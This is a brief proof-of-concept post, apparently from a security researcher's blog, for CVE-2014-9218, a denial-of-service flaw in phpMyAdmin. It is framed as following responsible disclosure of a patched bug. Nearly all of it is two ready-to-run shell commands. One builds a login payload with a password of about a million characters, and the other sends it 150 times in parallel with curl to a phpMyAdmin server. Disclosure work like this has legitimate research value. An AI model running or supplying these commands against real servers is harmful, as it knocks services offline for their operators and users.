CVE-2014-9218 phpMyAdmin DoS Proof of Concept

Assuming that time enough has happened since the security update was released by phpMyAdmin, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.

You can read the vulnerability details in the previous blog post. In this one, we show you  the way to exploit it.

1 - Create the payload.

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload

2 - Performing the Denial of Service attack.

$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done